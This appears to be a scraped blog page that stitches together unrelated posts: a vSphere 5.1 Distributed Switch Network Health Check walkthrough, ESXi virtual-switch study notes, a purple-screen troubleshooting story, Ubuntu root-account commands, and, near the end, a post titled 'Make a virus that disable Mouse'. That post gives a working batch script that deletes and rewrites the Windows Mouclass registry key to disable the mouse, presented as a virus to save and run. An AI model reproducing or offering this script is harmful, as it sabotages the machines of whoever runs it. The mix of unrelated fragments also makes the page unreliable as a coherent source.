New 5.1 Distributed Switch Features – Network Health Check


Another VMworld is upon us, and promises to yet again unleash a hurricane of excitement around the various products and services that are offered by VMware. Through some good fortune, I was invited to participate in an early access program so that I could digest the fruits of VMware’s labor a bit early, and deliver content to you in a longer form, lab tested format. All of the technology presented here has been verified and “tinkered with” in the Wahl Network lab on VMware ESXi 5.1.0 build 613838 (beta).

This deep dive series will go into all of the awesome goodies that are baked into the newly released vSphere Distributed Switch (vDS) in version 5.1. I’ve broken the posts up into 4 different parts so that you can sample them at your leisure without having to run through a 40 mile long post. Here are the links to the entire series:

Embrace The Web Client

My long time friend and enemy, the vSphere Client, is slowly shuffling off into the corner as his spiffy new buddy takes the spotlight. The vSphere Web Client is officially taking the position of lead access method moving forward past vSphere 5.1. While VMware has made the comment that they will continue to support the vSphere Client (which you may also know as the Windows Client or the Thick Client), new functionality and features will be tightly integrated with the Web Client.

I’d highly advise that you begin getting comfortable with the Web Client. After using the vSphere Client for many years, I can say that the Web Client does take some getting used to – often times I’d have both open and fight the urge to switch back. That being said, the Web Client has a ton of functionality in it, requires no install (yay), and has many features that the vSphere Client simply does not have (such as multitasking, scalability, etc.).

Since this is a vDS deep dive, I’ll spotlight a few differences I noticed between the two clients right away.

Creating a vDS

When creating a vDS, the first few screens look almost identical to the vSphere Client. As seen here, I have selected the new vDS version 5.1.0.

The third screen offers some neat functionality that is missing in the vSphere Client. Not only can I toggle NIOC (enabled by default), but I can edit the default port group name. Normally I just decline the offer to make a default port group because it’s a name I don’t like (dvPortgroup). Here, I can make my first one and name it. Nothing earth shattering, but a thoughtful improvement.

Managing Hosts on the vDS

I am pointing this out because I was confused the first time I saw this. When you go to manage hosts on a vDS, the list is empty by default. I thought perhaps I stumbled upon a bug or did something wrong. In actuality, I just needed to press the “Choose Existing” button (highlighted below) to see the hosts that belonged to the vDS.

Now, on to the good stuff.

Network Health Check Overview

The new Network Health Check feature is top of my list of exciting new features in the new vDS 5.1. It offers administrators the ability to check for a few common misconfiguration errors before you ever put a virtual machine or VMkernel port on the wire.

Per VMware:

This tool is very helpful in an organization where the network administrators and vSphere administrators respectively take the management ownership of physical network switches and vSphere hosts. In such organizations vSphere admins can provide the network related warnings to the network admins and help identify issues quickly.

The Network Health Check feature looks at three distinct configurations: VLAN, MTU, and Teaming.

VLAN Mismatch

In a VLAN mismatch case, the virtual switch VLAN does not match an available VLAN on the physical switch. I think this is a rather common issue from a day-to-day perspective. For example, say that you want to use VLAN 555 for virtual machine traffic on a portgroup. If VLAN 555 does not exist on the physical switch, you won’t really know about it unless you pass some traffic on the switch first (typically by throwing a VM onto the portgroup and seeing if it can ping something). Those days are over!

As seen here, my lab host has a vDS configured named “WahlNetwork-vDS1″ with Health Check enabled. I have created a number of different portgroups using VLAN 10, 254, and 555.

Only VLAN 10 exists upstream on the physical switch and shows a VLAN Status of “Supported” while all the others are “Not supported”. I am now aware that I need to check the physical interface to see what VLANs are assigned or use a different VLAN on my virtual switch (in a normal situation I may have simply entered the wrong VLAN number). Also in this example below, I want to emphasize that I have no virtual machines running at all – the Health Check can operate with absolutely nothing on the portgroup.

Under the hood, the vDS is sending some broadcast frames out to see if the VLAN exists. Note that this essentially limits the checking to the access layer, and will not flow further to the distribution (aggregation) or core layers.

MTU Mismatch

The new Network Health Check feature is also able to find MTU mismatches from the vNIC, virtual switch, physical adapter (vmnic), and physical switch port. This is very handy in the use case of Jumbo Frames, as there are a lot of touch points that require setting an MTU of 9000.

Teaming Mismatch

The final check is for a teaming mismatch. If the physical switch is configured for EtherChannel (or Link Aggregation Group), you are supposed to set the portgroup to use a teaming policy of IP Hash. The Health Check will identify when a mismatch occurs.

In the case below, I have enabled IP Hash on a portgroup on a set of uplinks that are not in an EtherChannel. This creates a mismatch, as the virtual side is set to IP Hash while the physical side is not.

Alarms

The checks also produce alarms in vCenter that can trigger an event of your choosing (such as an email), so you don’t have to poke your nose into the Monitor section of the vDS all the time. This could also be a great watchdog for ensuring that no changes are made throughout the day, or be something you have send an alert to your network team so they can promptly correct any changes that were made.

ESXi Networking


One of the items that becomes apparent when using VMware is that you need to have a strong understanding of routing and switching.

This blog post is a bit self indulgent as I’m preparing for the VCP 5 exam, I thought it would be good for me to put together a few posts on the achitecture of the switches.

All of the switches within ESXi are software based and operate within the VMkernel.  They are called virtual switches (vSwitches) and are Layer 2 devices, which are capable of trunking and passing VLAN traffic.  A common myth is that vSwitches can trunk ports together using 802.1q. vSwitches do not use Spanning Tree Protocol as one vSwitch cannot be connected to another vSwitch.

Standard Switch (vSwitch)

These are created when we first install ESXi onto our server hardware.  By default this is called vSwitch0 and contains 120 visible Ports (actually holds 128 Ports, 8 are reserverd by the VMkernel), the first virtual machine ‘port group’ called VMNetwork and a Management Network which is used by the VMKernel.

Distributed Switch (dvSwitch)

These are standard switches which are logically grouped across all ESXi hosts who share a common distributed switch configuration. These are only available with Enterprise Plus licenses.

Port Groups

These reside within a vSwitch.  Port groups contain two different configurations:

– VMkernal Ports allow vMotion, Fault Tolerant Logging, iSCSI NAS, NFS traffic between ESXi hosts as well as allowing management of the ESXi host it resides on.

– VM Ports allow a virtual machines to access other virtual machines or network based resources.

The key thing to remember is that with Port Groups they must be named exactly the same across all ESXi hosts to allow traffic to flow.

Note, it is possible to have a vSwitch without any Port Groups, however this would be like having a physical switch without any physical ports!

Uplinks (pNIC)

An uplink if the physical network adapter that the vSwitch is connected too.  Without this the virtual machines that reside on the vSwitch would be isolated and unable to communicate with the rest of the network.

In the picture below we have a Standard Switch called vSwitch1 whose physical uplink (pNIC) is vmnic4.  It contains two different port groups, one for vMotion and Fault Tolerant Logging and the other for VM’s on VLAN29.

Even though we have two different port groups, it is important to remember that each port group is a boundary for communications, broadcasts and security policys.

 

VMkernel Ports

the VMkernel network carries traffic for:

– vMotion – iSCSI – NFS – Fault Tolerance Logging

VMkernel ports require an IP address, you can have more than one VMkernel network if you feel this level of redundancy is appropriate in your network.  Or you could have one VMkernel network for Management Traffic, Fault Tolerance Logging and vMotion (however I would recommend against this).

VM Ports

Virtual Machine port groups are quite different to VMKernel Ports as they do not require an IP address or an uplink (physical NIC) to work.  They work in exactly the same was an unmanaged physical switch, you plug it in and off you go!

VLAN

Using VLAN’s within ESXi generally is a must unless you have an abundance of physical NIC’s (the limit is 32 per ESXi Host).  VLAN’s provide secure traffic segmentation and reduce broadcast traffic across networks.

We can have multiple Port Groups per uplink if required.  When configuring VLAN’s these can be performed in one of three ways:

– VM Port Group, when adding a new port group you can specify the VLAN ID in the properties of the port group (most common).

– Physical Switch, you can ‘untag’ the uplink that the VM Port Group resides on which forces it into the VLAN ID specified on the physical switch (common).

– Virtual Guest Tagging, this is when the virtual machine is responsible for VLAN tagging.  From an ESXi perspective you need to use VLAN ID 4095 (uncommon).

The uplink that is connected to the physical switch must be configured as a ‘trunk port’ to enable the switch port to carry traffic from multiple VLAN’s at the same time.

Below is an example Standard vSwitch0, from my home LAB, this has one uplink and has three different VLAN’s in play.

VLAN  1 which is the default VLAN and is used by the VMKernel for Management Network purposes and also my Server2012 RC.

VLAN 2 holds my nested ESXi Hosts and vCentre Virtual Appliance.

VLAN 3 holds my iSCSI Storage Area Networks.

NIC Teaming

NIC teaming is used to connect multiple uplinks to a single vSwitch commonly for redundancy and load balancing purposes.

I have seen many NIC teams created with no thought for redundancy on the network card.

Incorrect NIC Teaming

In this configuration we have no resilience for network card failure.

Correct NIC Teaming

In this configuration we have resilience for network card failure.

NIC Teaming

The load balancing on NIC teams in ESXi is based on number of connections (think Round Robin) on Windows Server 2003/2008.

Load balancing only occurs on outbound connections i.e. traffic from VM > vSwitch > LAN

ESXi has a number of load balancing options which are:

Route Based on the Originating Virtual Port ID

ESXi runs an algorithm to evenly balance the number of connections across multiple uplinks e.g. 10 virtual machines residing on one vSwith which contains two uplinks would means that each uplink has 5 virtual machines using it.

Once a VM is assigned to an uplink by the VMkernel it continues to use this until it is vMotioned to another ESXi Host or a uplink failure occurs.

Route based on the originating virtual port ID is the default setting in ESXi.

Route Based on Source MAC Hash

This is much like ‘route based on originating virtual port ID’ as the MAC address of the VM’s do not change and therefore they will continue to use the same connection path over and over.  The only way around this is to have multiple virtual NICs (vNIC’s) within the VM which will produce multiple MAC addresses.

Route Based on IP Hash

This uses the source IP and destination IP to create an Hash.  So on each new connection a different uplink path would be taken.  Naturally, if you are transferring large amount of data, the same path would be used until the transfer had finished.

When enabling ‘Route Based on IP Hash’ you will get an information bubble:

You need to ensure that all uplinks are connected to the same physical switch and that all port groups on the same vSwitch are configured to use ‘route based on IP hash’.

Use Explicit Failover Order

This isn’t really load balancing as the secondary active (vmnic1) uplink will only come into play if vmnic4 fails.

If you have an active and standby adapter, the same procedure applies.

On all Load Balancing policies it is set by default to notify switches, what does this actually mean? Well it means that the physical switches learn that:

– A vMotion occurs – A MAC address is changed – A NIC team failover or failback has occurred – A VM is powered on

Virtual Switch Security

Virtual switch security has three different elements which are:

– Promiscuous Mode, this is where the vSwitch and/or Port Group can see traffic which is not for itself. – MAC Address Changes, this is where the vSwitch and/or Port Group is interested if the incoming traffic into the vSwitch/Port Group has been altered. – Forged Transmits, this is where the vSwitch and/or Port Group is interested if the outgoing traffic into the vSwitch/Port Group has been altered.

In all of the above configurations you have a choice to either Reject or Accept the traffic.

VMware recommends that all of these are set to reject.

However if you are using Network Load Balancing or devices with ‘Virtual IP Address’s’ such as Hardware Load Balancers often use an algorithm that produces a shared MAC Address which is different from the original source or destination MAC address and therefore can cause traffic not to pass.

If in doubt you can always turn all three to reject, however I would recommend letting the Server Team know first!

ESXi 5 Purple Screen of Death in VMware Workstation 8


Interpreting the Errors

I was able to find an excellent VMware knowledge base article on how to interpret purple screen errors.  You can find it here: Interpreting an ESX host purple diagnostic screen

When I returned to make Workstation the active window, I was confronted with the dialogue box below, glowing purple from what awaited me in the background.

Hmm.  So from line 2 of the screen shot below, we can see that physical CPU 0 (pCPU 0) had no heartbeats.  Then a bit further down the message, we can see that pCPU 0 “didn’t have a heartbeat for 2728 seconds,” and that it “*may* be locked up.”  This tells me that the virtualized ESXi box was basically unresponsive for about 45 minutes.

What’s the problem?

I couldn’t find anything specific that told me exactly what the problem was, but I came to the conclusion that it was the laptop power settings causing the issue.  When working in the test lab in the past, I was usually active in the lab – never letting the computer go into power saving mode.  Apparently, I left the laptop idle too long and it went to sleep and stopped the hard disks.

I’m using Windows 7 Ultimate 64-bit.  You can change the power settings easily by going to Control Panel > Power Settings > Change when the computer sleeps, and changing the appropriate options to never put the computer to sleep.

Root Access for Ubuntu


to set/change root pwd:

>$ sudo passwd root

  1. Enter your User account password
  2. Enter new root password
  3. Retype root password

Change Ubuntu terminal username


The first thing you need to do is press Ctrl – Alt – T on your keyboard to open Terminal. When it opens, run the commands below to create a new password for the root account. You’ll get prompted to create a new password for the root account. Do it.

sudo passwd root

 

Next, run the commands below to unlock the root account.

sudo passwd -u root

 

After unlocking it, log out and login as the root user from the logon screen.

 

When you login, press Ctrl – Alt – T on your keyboard to open Terminal. When it opens run the commands below to change your username.

usermod -c “Real Name” -l new_name old_name

 

 

When you’re done, lock the root account again and restart.

passwd -l root

Make a virus that disable Mouse


a batch virus which is harmfull it will disable your mouses think before trying it on yourself.

  • Open Notepad and copy below codes

rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————

  • Save this file as  virus.bat
  • Done you just created your virus.

Installing Lync Server Enterprise – Primeira Parte


%d bloggers like this: